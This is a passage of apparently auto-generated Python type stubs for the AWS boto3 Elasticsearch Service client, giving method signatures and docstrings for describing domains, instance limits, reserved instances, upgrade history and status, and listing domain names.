'SecurityGroupIds': [
'string',
]
},
'CognitoOptions': {
'Enabled': True|False,
'UserPoolId': 'string',
'IdentityPoolId': 'string',
'RoleArn': 'string'
},
'EncryptionAtRestOptions': {
'Enabled': True|False,
'KmsKeyId': 'string'
},
'NodeToNodeEncryptionOptions': {
'Enabled': True|False
},
'AdvancedOptions': {
'string': 'string'
},
'LogPublishingOptions': {
'string': {
'CloudWatchLogsLogGroupArn': 'string',
'Enabled': True|False
}
},
'ServiceSoftwareOptions': {
'CurrentVersion': 'string',
'NewVersion': 'string',
'UpdateAvailable': True|False,
'Cancellable': True|False,
'UpdateStatus': 'PENDING_UPDATE'|'IN_PROGRESS'|'COMPLETED'|'NOT_ELIGIBLE'|'ELIGIBLE',
'Description': 'string',
'AutomatedUpdateDate': datetime(2015, 1, 1)
}
},
]
}
**Response Structure**
- *(dict) --*
The result of a ``DescribeElasticsearchDomains`` request. Contains the status of the specified domains or all domains owned by the account.
- **DomainStatusList** *(list) --*
The status of the domains requested in the ``DescribeElasticsearchDomains`` request.
- *(dict) --*
The current status of an Elasticsearch domain.
- **DomainId** *(string) --*
The unique identifier for the specified Elasticsearch domain.
- **DomainName** *(string) --*
The name of an Elasticsearch domain. Domain names are unique across the domains owned by an account within an AWS region. Domain names start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
- **ARN** *(string) --*
The Amazon resource name (ARN) of an Elasticsearch domain. See `Identifiers for IAM Entities <http://docs.aws.amazon.com/IAM/latest/UserGuide/index.html?Using_Identifiers.html>`__ in *Using AWS Identity and Access Management* for more information.
- **Created** *(boolean) --*
The domain creation status. ``True`` if the creation of an Elasticsearch domain is complete. ``False`` if domain creation is still in progress.
- **Deleted** *(boolean) --*
The domain deletion status. ``True`` if a delete request has been received for the domain but resource cleanup is still in progress. ``False`` if the domain has not been deleted. Once domain deletion is complete, the status of the domain is no longer returned.
- **Endpoint** *(string) --*
The Elasticsearch domain endpoint that you use to submit index and search requests.
- **Endpoints** *(dict) --*
Map containing the Elasticsearch domain endpoints used to submit index and search requests. Example ``key, value`` : ``'vpc','vpc-endpoint-h2dsd34efgyghrtguk5gt6j2foh4.us-east-1.es.amazonaws.com'`` .
- *(string) --*
- *(string) --*
The endpoint to which service requests are submitted. For example, ``search-imdb-movies-oopcnjfn6ugofer3zx5iadxxca.eu-west-1.es.amazonaws.com`` or ``doc-imdb-movies-oopcnjfn6ugofer3zx5iadxxca.eu-west-1.es.amazonaws.com`` .
- **Processing** *(boolean) --*
The status of the Elasticsearch domain configuration. ``True`` if Amazon Elasticsearch Service is processing configuration changes. ``False`` if the configuration is active.
- **UpgradeProcessing** *(boolean) --*
The status of an Elasticsearch domain version upgrade. ``True`` if Amazon Elasticsearch Service is undergoing a version upgrade. ``False`` if the configuration is active.
- **ElasticsearchVersion** *(string) --*
- **ElasticsearchClusterConfig** *(dict) --*
The type and number of instances in the domain cluster.
- **InstanceType** *(string) --*
The instance type for an Elasticsearch cluster.
- **InstanceCount** *(integer) --*
The number of instances in the specified domain cluster.
- **DedicatedMasterEnabled** *(boolean) --*
A boolean value to indicate whether a dedicated master node is enabled. See `About Dedicated Master Nodes <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-dedicatedmasternodes>`__ for more information.
- **ZoneAwarenessEnabled** *(boolean) --*
A boolean value to indicate whether zone awareness is enabled. See `About Zone Awareness <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-zoneawareness>`__ for more information.
- **ZoneAwarenessConfig** *(dict) --*
Specifies the zone awareness configuration for a domain when zone awareness is enabled.
- **AvailabilityZoneCount** *(integer) --*
An integer value to indicate the number of availability zones for a domain when zone awareness is enabled. This should be equal to number of subnets if VPC endpoints is enabled
- **DedicatedMasterType** *(string) --*
The instance type for a dedicated master node.
- **DedicatedMasterCount** *(integer) --*
Total number of dedicated master nodes, active and on standby, for the cluster.
- **EBSOptions** *(dict) --*
The ``EBSOptions`` for the specified domain. See `Configuring EBS-based Storage <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomain-configure-ebs>`__ for more information.
- **EBSEnabled** *(boolean) --*
Specifies whether EBS-based storage is enabled.
- **VolumeType** *(string) --*
Specifies the volume type for EBS-based storage.
- **VolumeSize** *(integer) --*
Integer to specify the size of an EBS volume.
- **Iops** *(integer) --*
Specifies the IOPD for a Provisioned IOPS EBS volume (SSD).
- **AccessPolicies** *(string) --*
IAM access policy as a JSON-formatted string.
- **SnapshotOptions** *(dict) --*
Specifies the status of the ``SnapshotOptions``
- **AutomatedSnapshotStartHour** *(integer) --*
Specifies the time, in UTC format, when the service takes a daily automated snapshot of the specified Elasticsearch domain. Default value is ``0`` hours.
- **VPCOptions** *(dict) --*
The ``VPCOptions`` for the specified domain. For more information, see `VPC Endpoints for Amazon Elasticsearch Service Domains <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html>`__ .
- **VPCId** *(string) --*
The VPC Id for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- **SubnetIds** *(list) --*
Specifies the subnets for VPC endpoint.
- *(string) --*
- **AvailabilityZones** *(list) --*
The availability zones for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- *(string) --*
- **SecurityGroupIds** *(list) --*
Specifies the security groups for VPC endpoint.
- *(string) --*
- **CognitoOptions** *(dict) --*
The ``CognitoOptions`` for the specified domain. For more information, see `Amazon Cognito Authentication for Kibana <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-cognito-auth.html>`__ .
- **Enabled** *(boolean) --*
Specifies the option to enable Cognito for Kibana authentication.
- **UserPoolId** *(string) --*
Specifies the Cognito user pool ID for Kibana authentication.
- **IdentityPoolId** *(string) --*
Specifies the Cognito identity pool ID for Kibana authentication.
- **RoleArn** *(string) --*
Specifies the role ARN that provides Elasticsearch permissions for accessing Cognito resources.
- **EncryptionAtRestOptions** *(dict) --*
Specifies the status of the ``EncryptionAtRestOptions`` .
- **Enabled** *(boolean) --*
Specifies the option to enable Encryption At Rest.
- **KmsKeyId** *(string) --*
Specifies the KMS Key ID for Encryption At Rest options.
- **NodeToNodeEncryptionOptions** *(dict) --*
Specifies the status of the ``NodeToNodeEncryptionOptions`` .
- **Enabled** *(boolean) --*
Specify true to enable node-to-node encryption.
- **AdvancedOptions** *(dict) --*
Specifies the status of the ``AdvancedOptions``
- *(string) --*
- *(string) --*
- **LogPublishingOptions** *(dict) --*
Log publishing options for the given domain.
- *(string) --*
Type of Log File, it can be one of the following:
* INDEX_SLOW_LOGS: Index slow logs contain insert requests that took more time than configured index query log threshold to execute.
* SEARCH_SLOW_LOGS: Search slow logs contain search queries that took more time than configured search query log threshold to execute.
* ES_APPLICATION_LOGS: Elasticsearch application logs contain information about errors and warnings raised during the operation of the service and can be useful for troubleshooting.
- *(dict) --*
Log Publishing option that is set for given domain. Attributes and their details:
* CloudWatchLogsLogGroupArn: ARN of the Cloudwatch log group to which log needs to be published.
* Enabled: Whether the log publishing for given log type is enabled or not
- **CloudWatchLogsLogGroupArn** *(string) --*
ARN of the Cloudwatch log group to which log needs to be published.
- **Enabled** *(boolean) --*
Specifies whether given log publishing option is enabled or not.
- **ServiceSoftwareOptions** *(dict) --*
The current status of the Elasticsearch domain's service software.
- **CurrentVersion** *(string) --*
The current service software version that is present on the domain.
- **NewVersion** *(string) --*
The new service software version if one is available.
- **UpdateAvailable** *(boolean) --*
``True`` if you are able to update you service software version. ``False`` if you are not able to update your service software version.
- **Cancellable** *(boolean) --*
``True`` if you are able to cancel your service software version update. ``False`` if you are not able to cancel your service software version.
- **UpdateStatus** *(string) --*
The status of your service software update. This field can take the following values: ``ELIGIBLE`` , ``PENDING_UPDATE`` , ``IN_PROGRESS`` , ``COMPLETED`` , and ``NOT_ELIGIBLE`` .
- **Description** *(string) --*
The description of the ``UpdateStatus`` .
- **AutomatedUpdateDate** *(datetime) --*
Timestamp, in Epoch time, until which you can manually request a service software update. After this date, we automatically update your service software.
:type DomainNames: list
:param DomainNames: **[REQUIRED]**
The Elasticsearch domains for which you want information.
- *(string) --*
The name of an Elasticsearch domain. Domain names are unique across the domains owned by an account within an AWS region. Domain names start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
:rtype: dict
:returns:
"""
pass
def describe_elasticsearch_instance_type_limits(self, InstanceType: str, ElasticsearchVersion: str, DomainName: str = None) -> Dict:
"""
Describe Elasticsearch Limits for a given InstanceType and ElasticsearchVersion. When modifying existing Domain, specify the `` DomainName `` to know what Limits are supported for modifying.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/DescribeElasticsearchInstanceTypeLimits>`_
**Request Syntax**
::
response = client.describe_elasticsearch_instance_type_limits(
DomainName='string',
InstanceType='m3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
ElasticsearchVersion='string'
)
**Response Syntax**
::
{
'LimitsByRole': {
'string': {
'StorageTypes': [
{
'StorageTypeName': 'string',
'StorageSubTypeName': 'string',
'StorageTypeLimits': [
{
'LimitName': 'string',
'LimitValues': [
'string',
]
},
]
},
],
'InstanceLimits': {
'InstanceCountLimits': {
'MinimumInstanceCount': 123,
'MaximumInstanceCount': 123
}
},
'AdditionalLimits': [
{
'LimitName': 'string',
'LimitValues': [
'string',
]
},
]
}
}
}
**Response Structure**
- *(dict) --*
Container for the parameters received from `` DescribeElasticsearchInstanceTypeLimits `` operation.
- **LimitsByRole** *(dict) --*
Map of Role of the Instance and Limits that are applicable. Role performed by given Instance in Elasticsearch can be one of the following:
* Data: If the given InstanceType is used as Data node
* Master: If the given InstanceType is used as Master node
- *(string) --*
- *(dict) --*
Limits for given InstanceType and for each of it's role. Limits contains following `` StorageTypes, `` `` InstanceLimits `` and `` AdditionalLimits ``
- **StorageTypes** *(list) --*
StorageType represents the list of storage related types and attributes that are available for given InstanceType.
- *(dict) --*
StorageTypes represents the list of storage related types and their attributes that are available for given InstanceType.
- **StorageTypeName** *(string) --*
Type of the storage. List of available storage options:
* instance
Inbuilt storage available for the given Instance
* ebs
Elastic block storage that would be attached to the given Instance
- **StorageSubTypeName** *(string) --*
SubType of the given storage type. List of available sub-storage options: For "instance" storageType we wont have any storageSubType, in case of "ebs" storageType we will have following valid storageSubTypes
* standard
* gp2
* io1
Refer `` VolumeType`` for more information regarding above EBS storage options.
- **StorageTypeLimits** *(list) --*
List of limits that are applicable for given storage type.
- *(dict) --*
Limits that are applicable for given storage type.
- **LimitName** *(string) --*
Name of storage limits that are applicable for given storage type. If `` StorageType `` is ebs, following storage options are applicable
* MinimumVolumeSize
Minimum amount of volume size that is applicable for given storage type.It can be empty if it is not applicable.
* MaximumVolumeSize
Maximum amount of volume size that is applicable for given storage type.It can be empty if it is not applicable.
* MaximumIops
Maximum amount of Iops that is applicable for given storage type.It can be empty if it is not applicable.
* MinimumIops
Minimum amount of Iops that is applicable for given storage type.It can be empty if it is not applicable.
- **LimitValues** *(list) --*
Values for the `` StorageTypeLimit$LimitName `` .
- *(string) --*
- **InstanceLimits** *(dict) --*
InstanceLimits represents the list of instance related attributes that are available for given InstanceType.
- **InstanceCountLimits** *(dict) --*
InstanceCountLimits represents the limits on number of instances that be created in Amazon Elasticsearch for given InstanceType.
- **MinimumInstanceCount** *(integer) --*
Minimum number of Instances that can be instantiated for given InstanceType.
- **MaximumInstanceCount** *(integer) --*
Maximum number of Instances that can be instantiated for given InstanceType.
- **AdditionalLimits** *(list) --*
List of additional limits that are specific to a given InstanceType and for each of it's `` InstanceRole `` .
- *(dict) --*
List of limits that are specific to a given InstanceType and for each of it's `` InstanceRole `` .
- **LimitName** *(string) --*
Name of Additional Limit is specific to a given InstanceType and for each of it's `` InstanceRole `` etc. Attributes and their details:
* MaximumNumberOfDataNodesSupported
This attribute will be present in Master node only to specify how much data nodes upto which given `` ESPartitionInstanceType `` can support as master node.
* MaximumNumberOfDataNodesWithoutMasterNode
This attribute will be present in Data node only to specify how much data nodes of given `` ESPartitionInstanceType `` upto which you don't need any master nodes to govern them.
- **LimitValues** *(list) --*
Value for given `` AdditionalLimit$LimitName `` .
- *(string) --*
:type DomainName: string
:param DomainName:
DomainName represents the name of the Domain that we are trying to modify. This should be present only if we are querying for Elasticsearch `` Limits `` for existing domain.
:type InstanceType: string
:param InstanceType: **[REQUIRED]**
The instance type for an Elasticsearch cluster for which Elasticsearch `` Limits `` are needed.
:type ElasticsearchVersion: string
:param ElasticsearchVersion: **[REQUIRED]**
Version of Elasticsearch for which `` Limits `` are needed.
:rtype: dict
:returns:
"""
pass
def describe_reserved_elasticsearch_instance_offerings(self, ReservedElasticsearchInstanceOfferingId: str = None, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Lists available reserved Elasticsearch instance offerings.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/DescribeReservedElasticsearchInstanceOfferings>`_
**Request Syntax**
::
response = client.describe_reserved_elasticsearch_instance_offerings(
ReservedElasticsearchInstanceOfferingId='string',
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'NextToken': 'string',
'ReservedElasticsearchInstanceOfferings': [
{
'ReservedElasticsearchInstanceOfferingId': 'string',
'ElasticsearchInstanceType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'Duration': 123,
'FixedPrice': 123.0,
'UsagePrice': 123.0,
'CurrencyCode': 'string',
'PaymentOption': 'ALL_UPFRONT'|'PARTIAL_UPFRONT'|'NO_UPFRONT',
'RecurringCharges': [
{
'RecurringChargeAmount': 123.0,
'RecurringChargeFrequency': 'string'
},
]
},
]
}
**Response Structure**
- *(dict) --*
Container for results from ``DescribeReservedElasticsearchInstanceOfferings``
- **NextToken** *(string) --*
Provides an identifier to allow retrieval of paginated results.
- **ReservedElasticsearchInstanceOfferings** *(list) --*
List of reserved Elasticsearch instance offerings
- *(dict) --*
Details of a reserved Elasticsearch instance offering.
- **ReservedElasticsearchInstanceOfferingId** *(string) --*
The Elasticsearch reserved instance offering identifier.
- **ElasticsearchInstanceType** *(string) --*
The Elasticsearch instance type offered by the reserved instance offering.
- **Duration** *(integer) --*
The duration, in seconds, for which the offering will reserve the Elasticsearch instance.
- **FixedPrice** *(float) --*
The upfront fixed charge you will pay to purchase the specific reserved Elasticsearch instance offering.
- **UsagePrice** *(float) --*
The rate you are charged for each hour the domain that is using the offering is running.
- **CurrencyCode** *(string) --*
The currency code for the reserved Elasticsearch instance offering.
- **PaymentOption** *(string) --*
Payment option for the reserved Elasticsearch instance offering
- **RecurringCharges** *(list) --*
The charge to your account regardless of whether you are creating any domains using the instance offering.
- *(dict) --*
Contains the specific price and frequency of a recurring charges for a reserved Elasticsearch instance, or for a reserved Elasticsearch instance offering.
- **RecurringChargeAmount** *(float) --*
The monetary amount of the recurring charge.
- **RecurringChargeFrequency** *(string) --*
The frequency of the recurring charge.
:type ReservedElasticsearchInstanceOfferingId: string
:param ReservedElasticsearchInstanceOfferingId:
The offering identifier filter value. Use this parameter to show only the available offering that matches the specified reservation identifier.
:type MaxResults: integer
:param MaxResults:
Set this value to limit the number of results returned. If not specified, defaults to 100.
:type NextToken: string
:param NextToken:
NextToken should be sent in case if earlier API call produced result containing NextToken. It is used for pagination.
:rtype: dict
:returns:
"""
pass
def describe_reserved_elasticsearch_instances(self, ReservedElasticsearchInstanceId: str = None, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Returns information about reserved Elasticsearch instances for this account.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/DescribeReservedElasticsearchInstances>`_
**Request Syntax**
::
response = client.describe_reserved_elasticsearch_instances(
ReservedElasticsearchInstanceId='string',
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'NextToken': 'string',
'ReservedElasticsearchInstances': [
{
'ReservationName': 'string',
'ReservedElasticsearchInstanceId': 'string',
'ReservedElasticsearchInstanceOfferingId': 'string',
'ElasticsearchInstanceType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'StartTime': datetime(2015, 1, 1),
'Duration': 123,
'FixedPrice': 123.0,
'UsagePrice': 123.0,
'CurrencyCode': 'string',
'ElasticsearchInstanceCount': 123,
'State': 'string',
'PaymentOption': 'ALL_UPFRONT'|'PARTIAL_UPFRONT'|'NO_UPFRONT',
'RecurringCharges': [
{
'RecurringChargeAmount': 123.0,
'RecurringChargeFrequency': 'string'
},
]
},
]
}
**Response Structure**
- *(dict) --*
Container for results from ``DescribeReservedElasticsearchInstances``
- **NextToken** *(string) --*
Provides an identifier to allow retrieval of paginated results.
- **ReservedElasticsearchInstances** *(list) --*
List of reserved Elasticsearch instances.
- *(dict) --*
Details of a reserved Elasticsearch instance.
- **ReservationName** *(string) --*
The customer-specified identifier to track this reservation.
- **ReservedElasticsearchInstanceId** *(string) --*
The unique identifier for the reservation.
- **ReservedElasticsearchInstanceOfferingId** *(string) --*
The offering identifier.
- **ElasticsearchInstanceType** *(string) --*
The Elasticsearch instance type offered by the reserved instance offering.
- **StartTime** *(datetime) --*
The time the reservation started.
- **Duration** *(integer) --*
The duration, in seconds, for which the Elasticsearch instance is reserved.
- **FixedPrice** *(float) --*
The upfront fixed charge you will paid to purchase the specific reserved Elasticsearch instance offering.
- **UsagePrice** *(float) --*
The rate you are charged for each hour for the domain that is using this reserved instance.
- **CurrencyCode** *(string) --*
The currency code for the reserved Elasticsearch instance offering.
- **ElasticsearchInstanceCount** *(integer) --*
The number of Elasticsearch instances that have been reserved.
- **State** *(string) --*
The state of the reserved Elasticsearch instance.
- **PaymentOption** *(string) --*
The payment option as defined in the reserved Elasticsearch instance offering.
- **RecurringCharges** *(list) --*
The charge to your account regardless of whether you are creating any domains using the instance offering.
- *(dict) --*
Contains the specific price and frequency of a recurring charges for a reserved Elasticsearch instance, or for a reserved Elasticsearch instance offering.
- **RecurringChargeAmount** *(float) --*
The monetary amount of the recurring charge.
- **RecurringChargeFrequency** *(string) --*
The frequency of the recurring charge.
:type ReservedElasticsearchInstanceId: string
:param ReservedElasticsearchInstanceId:
The reserved instance identifier filter value. Use this parameter to show only the reservation that matches the specified reserved Elasticsearch instance ID.
:type MaxResults: integer
:param MaxResults:
Set this value to limit the number of results returned. If not specified, defaults to 100.
:type NextToken: string
:param NextToken:
NextToken should be sent in case if earlier API call produced result containing NextToken. It is used for pagination.
:rtype: dict
:returns:
"""
pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
``ClientMethod``.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method\'s model.
:returns: The presigned url
"""
pass
def get_compatible_elasticsearch_versions(self, DomainName: str = None) -> Dict:
"""
Returns a list of upgrade compatible Elastisearch versions. You can optionally pass a `` DomainName `` to get all upgrade compatible Elasticsearch versions for that specific domain.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/GetCompatibleElasticsearchVersions>`_
**Request Syntax**
::
response = client.get_compatible_elasticsearch_versions(
DomainName='string'
)
**Response Syntax**
::
{
'CompatibleElasticsearchVersions': [
{
'SourceVersion': 'string',
'TargetVersions': [
'string',
]
},
]
}
**Response Structure**
- *(dict) --*
Container for response returned by `` GetCompatibleElasticsearchVersions `` operation.
- **CompatibleElasticsearchVersions** *(list) --*
A map of compatible Elasticsearch versions returned as part of the `` GetCompatibleElasticsearchVersions `` operation.
- *(dict) --*
A map from an `` ElasticsearchVersion `` to a list of compatible `` ElasticsearchVersion `` s to which the domain can be upgraded.
- **SourceVersion** *(string) --*
The current version of Elasticsearch on which a domain is.
- **TargetVersions** *(list) --*
List of supported elastic search versions.
- *(string) --*
:type DomainName: string
:param DomainName:
The name of an Elasticsearch domain. Domain names are unique across the domains owned by an account within an AWS region. Domain names start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
:rtype: dict
:returns:
"""
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:raise OperationNotPageableError: Raised if the operation is not
pageable. You can use the ``client.can_paginate`` method to
check if an operation is pageable.
:rtype: L{botocore.paginate.Paginator}
:return: A paginator object.
"""
pass
def get_upgrade_history(self, DomainName: str, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Retrieves the complete history of the last 10 upgrades that were performed on the domain.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/GetUpgradeHistory>`_
**Request Syntax**
::
response = client.get_upgrade_history(
DomainName='string',
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'UpgradeHistories': [
{
'UpgradeName': 'string',
'StartTimestamp': datetime(2015, 1, 1),
'UpgradeStatus': 'IN_PROGRESS'|'SUCCEEDED'|'SUCCEEDED_WITH_ISSUES'|'FAILED',
'StepsList': [
{
'UpgradeStep': 'PRE_UPGRADE_CHECK'|'SNAPSHOT'|'UPGRADE',
'UpgradeStepStatus': 'IN_PROGRESS'|'SUCCEEDED'|'SUCCEEDED_WITH_ISSUES'|'FAILED',
'Issues': [
'string',
],
'ProgressPercent': 123.0
},
]
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Container for response returned by `` GetUpgradeHistory `` operation.
- **UpgradeHistories** *(list) --*
A list of `` UpgradeHistory `` objects corresponding to each Upgrade or Upgrade Eligibility Check performed on a domain returned as part of `` GetUpgradeHistoryResponse `` object.
- *(dict) --*
History of the last 10 Upgrades and Upgrade Eligibility Checks.
- **UpgradeName** *(string) --*
A string that describes the update briefly
- **StartTimestamp** *(datetime) --*
UTC Timestamp at which the Upgrade API call was made in "yyyy-MM-ddTHH:mm:ssZ" format.
- **UpgradeStatus** *(string) --*
The overall status of the update. The status can take one of the following values:
* In Progress
* Succeeded
* Succeeded with Issues
* Failed
- **StepsList** *(list) --*
A list of `` UpgradeStepItem `` s representing information about each step performed as pard of a specific Upgrade or Upgrade Eligibility Check.
- *(dict) --*
Represents a single step of the Upgrade or Upgrade Eligibility Check workflow.
- **UpgradeStep** *(string) --*
Represents one of 3 steps that an Upgrade or Upgrade Eligibility Check does through:
* PreUpgradeCheck
* Snapshot
* Upgrade
- **UpgradeStepStatus** *(string) --*
The status of a particular step during an upgrade. The status can take one of the following values:
* In Progress
* Succeeded
* Succeeded with Issues
* Failed
- **Issues** *(list) --*
A list of strings containing detailed information about the errors encountered in a particular step.
- *(string) --*
- **ProgressPercent** *(float) --*
The Floating point value representing progress percentage of a particular step.
- **NextToken** *(string) --*
Pagination token that needs to be supplied to the next call to get the next page of results
:type DomainName: string
:param DomainName: **[REQUIRED]**
The name of an Elasticsearch domain. Domain names are unique across the domains owned by an account within an AWS region. Domain names start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
:type MaxResults: integer
:param MaxResults:
Set this value to limit the number of results returned.
:type NextToken: string
:param NextToken:
Paginated APIs accepts NextToken input to returns next page results and provides a NextToken output in the response which can be used by the client to retrieve more results.
:rtype: dict
:returns:
"""
pass
def get_upgrade_status(self, DomainName: str) -> Dict:
"""
Retrieves the latest status of the last upgrade or upgrade eligibility check that was performed on the domain.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/GetUpgradeStatus>`_
**Request Syntax**
::
response = client.get_upgrade_status(
DomainName='string'
)
**Response Syntax**
::
{
'UpgradeStep': 'PRE_UPGRADE_CHECK'|'SNAPSHOT'|'UPGRADE',
'StepStatus': 'IN_PROGRESS'|'SUCCEEDED'|'SUCCEEDED_WITH_ISSUES'|'FAILED',
'UpgradeName': 'string'
}
**Response Structure**
- *(dict) --*
Container for response returned by `` GetUpgradeStatus `` operation.
- **UpgradeStep** *(string) --*
Represents one of 3 steps that an Upgrade or Upgrade Eligibility Check does through:
* PreUpgradeCheck
* Snapshot
* Upgrade
- **StepStatus** *(string) --*
One of 4 statuses that a step can go through returned as part of the `` GetUpgradeStatusResponse `` object. The status can take one of the following values:
* In Progress
* Succeeded
* Succeeded with Issues
* Failed
- **UpgradeName** *(string) --*
A string that describes the update briefly
:type DomainName: string
:param DomainName: **[REQUIRED]**
The name of an Elasticsearch domain. Domain names are unique across the domains owned by an account within an AWS region. Domain names start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
:rtype: dict
:returns:
"""
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters
section of the service docs for a list of available waiters.
:returns: The specified waiter object.
:rtype: botocore.waiter.Waiter
"""
pass
def list_domain_names(self) -> Dict:
"""
Returns the name of all Elasticsearch domains owned by the current user's account.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/ListDomainNames>`_
**Request Syntax**
::
response = client.list_domain_names()
**Response Syntax**
::
{
'DomainNames': [
{
'DomainName': 'string'
},
]
}
**Response Structure**
- *(dict) --*
The result of a ``ListDomainNames`` operation. Contains the names of all Elasticsearch domains owned by this account.
- **DomainNames** *(list) --*
List of Elasticsearch domain names.
- *(dict) --*
- **DomainName** *(string) --*
Specifies the ``DomainName`` .
:rtype: dict
:returns:
"""
pass
